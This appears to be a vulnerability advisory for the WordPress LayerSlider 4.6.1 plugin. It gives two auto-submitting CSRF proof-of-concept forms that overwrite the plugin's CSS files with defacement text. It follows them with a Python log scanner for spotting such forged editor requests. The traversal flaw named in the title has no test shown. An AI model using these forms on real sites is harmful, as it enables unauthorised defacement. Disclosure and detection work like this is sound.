WordPress LayerSlider 4.6.1 CSRF / Traversal

路人甲    2014-03-15 07:50:33

Vulnerability Description

WordPress LayerSlider plugin version 4.6.1 suffers from cross-site request forgery and directory traversal vulnerabilities.

Test Code

CSRF

============CSRF 1============================================
Defaced URL can be found here: http://owned.tld/wp-content/uploads/layerslider.custom.css

<body onload="javascript:document.forms[0].submit()">
<form action="http://owned.tld/wp-admin/admin.php?page=layerslider_style_editor&edited=1" method="post">
<input type="hidden" name="posted_ls_styles_editor" value="1">
<textarea rows="10" cols="50" name="contents" id="editor">LOL OWNED</textarea>
</form>
    
    
=========== CSRF 2=====================================================
Defaced URL can be found here:

http://owned.tld/wp-content/plugins/LayerSlider/skins/noskin/skin.css

======================================================
<body onload="javascript:document.forms[0].submit()">
<form action="http://owned.tld/wp-admin/admin.php?page=layerslider_skin_editor" method="post" class="inner">
<input type="hidden" name="posted_ls_skin_editor" value="1">
<textarea rows="10" cols="50" name="contents" id="editor">

LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 
LOL OWNED 


</textarea>

</form>
=====================================================
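Both forms above are plain POSTs to the plugin's editor pages and carry no anti-CSRF token, so a forged submission shows up in the web server log as an editor POST whose Referer is not the site itself. The following is an added detection example, not part of the original advisory or the plugin: it assumes the Apache/nginx combined log format and uses the advisory's placeholder host `owned.tld`; the log lines and `other.example` are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Editor pages targeted by the two forms in the advisory.
EDITOR_PAGES = {"layerslider_style_editor", "layerslider_skin_editor"}

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def suspicious_editor_posts(lines, site_host):
    """Return (time, ip, page, referer) for editor POSTs not referred from site_host."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue  # the forms only work as POST; page views are GET
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        page = parse_qs(url.query).get("page", [""])[0]
        if page not in EDITOR_PAGES:
            continue
        # hostname is None for "-" or an empty Referer
        ref_host = urlsplit(m["referer"]).hostname
        if ref_host != site_host.lower():
            hits.append((m["time"], m["ip"], page, m["referer"]))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2014:07:41:02 +0000] "POST /wp-admin/admin.php?page=layerslider_style_editor&edited=1 HTTP/1.1" 302 0 "http://owned.tld/wp-admin/admin.php?page=layerslider_style_editor" "Mozilla/5.0"',
    '192.0.2.10 - - [15/Mar/2014:07:44:19 +0000] "POST /wp-admin/admin.php?page=layerslider_style_editor&edited=1 HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [15/Mar/2014:07:45:03 +0000] "POST /wp-admin/admin.php?page=layerslider_skin_editor HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Mar/2014:07:46:00 +0000] "GET /wp-admin/admin.php?page=layerslider_skin_editor HTTP/1.1" 200 5120 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [15/Mar/2014:07:47:30 +0000] "POST /wp-admin/admin.php?page=general_settings HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_editor_posts(SAMPLE_LOG, "owned.tld"):
        print(hit)
```

A missing Referer can also come from browser privacy settings, so treat hits as leads and compare them with the modification times of `layerslider.custom.css` and the skin's `skin.css`.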